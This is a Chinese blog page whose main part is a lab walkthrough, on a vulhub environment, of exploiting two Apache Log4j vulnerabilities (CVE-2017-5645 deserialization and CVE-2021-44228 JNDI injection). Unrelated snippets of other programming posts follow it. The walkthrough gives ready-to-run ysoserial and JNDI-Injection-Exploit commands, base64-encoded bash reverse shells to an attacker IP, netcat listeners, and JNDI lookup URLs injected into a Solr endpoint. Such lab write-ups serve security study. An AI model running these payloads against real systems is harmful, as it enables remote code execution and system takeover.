当前位置：首页 > news >正文

Log4j反序列化命令执行漏洞(CVE-2017-5645)Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

news 2026/2/1 20:38:00

一.Log4j反序列化命令执行漏洞(CVE-2017-5645）

Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

环境：vulhub
工具下载地址：
ysoserial

利用工具生成payload：

#创建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712#反弹shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1进行base64编码
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712

1.创建文件进入容器内部，查看文件创建成功

docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp 
ls

2.查看反弹的shell
有点问题没反弹成功，应该是这样做的

nc -lvvp 4466

二.Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码

环境：vulhub
工具下载地址：
JNDI-Injection-Exploit
1.利用dnslog平台检测是否有漏洞

后面换成dnslong平台的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}

在这里插入图片描述
2.利用工具反弹shell
(1)使用工具生成payload

1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1进行base64编码 填入echo后，-A参数后填入攻击机的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129

(2)选用一个作为url action后的payload，访问此url
这里选用第一个，下面的url访问

http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}

(3)攻击机开启监听

nc -lvvp 4444

在这里插入图片描述

参考文章：
CVE-2021-44228

Log4j反序列化命令执行漏洞(CVE-2017-5645)Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

一.Log4j反序列化命令执行漏洞(CVE-2017-5645） Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码环境：vulhub 工具下载地址&#xff1…...

编程日记 2023/8/23 21:07:35

echarts 之科技感进度条

1.图片展示 2.代码实现 /* ng qty 进度条 */ <template><div class"ngqty-progress"><div class"ngqty-info"><span>X4</span><span>50%</span></div><div :id"barNgQtyProgress index" c…...

编程日记 2023/8/23 21:06:33

多级菜单是很多业务场景需要的。下面是一种处理方式 // 生成树结构 func tree(menus []*video.XkVideoCategory, parentId uint) []*video.XkVideoCategory {//定义子节点目录var nodes []*video.XkVideoCategoryif reflect.ValueOf(menus).IsValid() {//循环所有一级菜单for …...

编程日记 2023/8/23 21:05:31

Oracle/PL/SQL奇技淫巧之Lable标签与循环控制

在一些存储过程场景中，可能存在需要在满足某些条件时跳出循环的场景， 但是在PL/SQL中，不能使用break语句直接跳出循环, 但是可以通过lable标签的方式跳出循环，例： <<outer_loop>> FOR i IN 1..5 LOOPDBMS…...

编程日记 2023/8/23 21:04:30

Docker基础操作

1.安装docker服务，配置镜像加速器安装docker服务清理缓存 sudo yum remove docker \ docker-client \ docker-client-latest \ docker-common \ docker-latest \ docker-latest-logrotate \ docker-logrotate \ docker-enginesystemctl enable --now docker 脚…...

编程日记 2023/8/23 21:03:29

AMBA总线协议（8）——AHB（六）：分割传输

一、前言在之前的文章中，我们重点介绍了AHB传输的仲裁，首先介绍了仲裁相关的信号，然后分别介绍了请求总线访问，授权总线访问，猝发提前终止，锁定传输和默认主机总线，在本文中我们将继续介绍AHB的…...

编程日记 2023/8/23 21:02:27

时序分解 | MATLAB实现基于SWD群体分解的信号分解分量可视化

时序分解 | MATLAB实现基于SWD群体分解的信号分解分量可视化目录时序分解 | MATLAB实现基于SWD群体分解的信号分解分量可视化效果一览基本介绍程序设计参考资料效果一览基本介绍基于SWD群体分解的分量可视化，基于群体分解的信号分解技术，MATLAB程序…...

编程日记 2023/8/23 21:01:25

【makefile】自动化变量的简述及实例

文章目录 10. env20. 简述百度百科常用的自动化变量 30. 实例90. 附件下载 10. env ubuntu1804 GNU Make 4.120. 简述百度百科 https://baike.baidu.com/item/Makefile/4619787?frge_ala makefile 文件的格式： 目标：依赖命令软件编译的流程概述&am…...

编程日记 2023/8/23 21:00:24

IntelliJ IDEA 官方网站 idea官网 http://www.jetbrains.com/idea/

IntelliJ IDEA 官方网站 idea官网 http://www.jetbrains.com/idea/ Idea下载官网一键直达： 官网一键直达...

编程日记 2023/8/23 20:59:19

C#，《小白学程序》第一课：初识程序

曰：扫地僧练就绝世武功的目的是为了扫地更干净。 1 文本格式 /// <summary> /// 《小白学程序》第一课：初识程序 /// </summary> /// <param name"sender"></param> /// <param name"e"></param&…...

编程日记 2023/8/23 20:58:17

LeetCode--HOT100题（38）

目录题目描述：226. 翻转二叉树（简单）题目接口解题思路代码 PS: 题目描述：226. 翻转二叉树（简单） 给你一棵二叉树的根节点 root ，翻转这棵二叉树，并返回其根节点。 LeetCode做题链…...

编程日记 2023/8/23 20:57:16

C语言：指针（超深度讲解）

目录指针： 学习目标： 指针可以理解为： 字符指针： 定义：字符指针 char*。字符指针的使用： 练习： 指针数组： 概念：指针数组是一个存放指针的数组。实现模拟二维…...

编程日记 2023/8/23 20:56:14

Docker详解

文章目录 Docker详解一、Docker简介什么是容器 ？容器技术有哪些优点 ？什么是Docker ？Docker的特点Docker的使用场景二、Docker的基本组成Docker 客户端 / 守护进程Docker Image 镜像Docker Container 容器Docker Registry 仓库三、Docker 依…...

编程日记 2023/8/23 20:55:14

软件开发方法：复用与扩展

软件开发方法：复用与扩展一、面向对象二、进一步认识一、面向对象封装工程上的意义：屏蔽细节，隔离变化 public、protected、private 继承工程上的意义：复用多态工程上的意义：高内聚，低耦合 —— 面…...

编程日记 2023/8/23 20:54:12

C++新经典09--函数新特性、inline内联函数与const详解

函数回顾与后置返回类型函数定义中如果有形参则形参应该有名字，而不光是只有类型，但是如果并不想使用这个形参，换句话说这个形参并不在这个函数中使用，则不给形参名也可以，但在调用这个函数的时候，该位置…...

编程日记 2023/8/23 20:53:11

C++中机器人应用程序的行为树（ROS2）

马库斯布赫霍尔茨一、说明以下文章为您提供了对机器人应用程序或框架中经常使用的行为树的一般直觉：ROS，Moveit和NAV2。了解行为 Tress （BT） 框架的原理为您提供了在游戏领域应用知识的绝佳机会。BT可以与Unity或Unreal集成。由…...

编程日记 2023/8/23 20:52:09

像Vuex一样使用redux

redux基础知识本篇文章主要介绍redux的基本使用方法，并简单封装，像vuex一样写redux 学习文档英文文档: https://redux.js.org/ 中文文档: http://www.redux.org.cn/ Github: https://github.com/reactjs/redux redux是什么 redux和vuex几乎是一…...

编程日记 2023/8/23 20:51:06

关于模板的大致认识【C++】

文章目录函数模板函数模板的原理函数模板的实例化模板参数的匹配原则类模板类模板的定义格式类模板的实例化非类型模板参数typename 与class模板的特化函数模板特化类模板特化全特化偏特化模板的分离编译函数模板函数模板的原理 template <typename T> //模板参数…...

编程日记 2023/8/23 20:50:05

C#如何遍历类的属性，并获取描述/注释

要获取属性的描述/注释，需要使用System.ComponentModel命名空间中的DescriptionAttribute。可以通过反射获取属性上的DescriptionAttribute，并获取其Description属性值。首先，需要引入System.ComponentModel命名空间： using Sy…...

编程日记 2023/8/23 20:49:04

ffmpeg 子进程从内存读取文件、提取图片到内存

除了网络、文件io，由python或java或go或c等语言开启的ffmpeg子进程还支持pipe，可以从stdin读入数据，输出转化后的图像到stdout。无需编译 ffmpeg，直接调用 ffmpeg.exe不香么！ “从内存读”可用于边下载边转码&#xf…...

编程日记 2023/8/23 20:48:02

SkyWalking 10.2.0 SWCK 配置过程

SkyWalking 10.2.0 & SWCK 配置过程 skywalking oap-server & ui 使用Docker安装在K8S集群以外，K8S集群中的微服务使用initContainer按命名空间将skywalking-java-agent注入到业务容器中。 SWCK有整套的解决方案，全安装在K8S群集中。具体可参…...

编程新知 2025/8/23 5:51:08

TDengine 快速体验（Docker 镜像方式）

简介 TDengine 可以通过安装包、Docker 镜像及云服务快速体验 TDengine 的功能，本节首先介绍如何通过 Docker 快速体验 TDengine，然后介绍如何在 Docker 环境下体验 TDengine 的写入和查询功能。如果你不熟悉 Docker，请使用安装包的方式快…...

编程新知 2026/1/31 2:55:18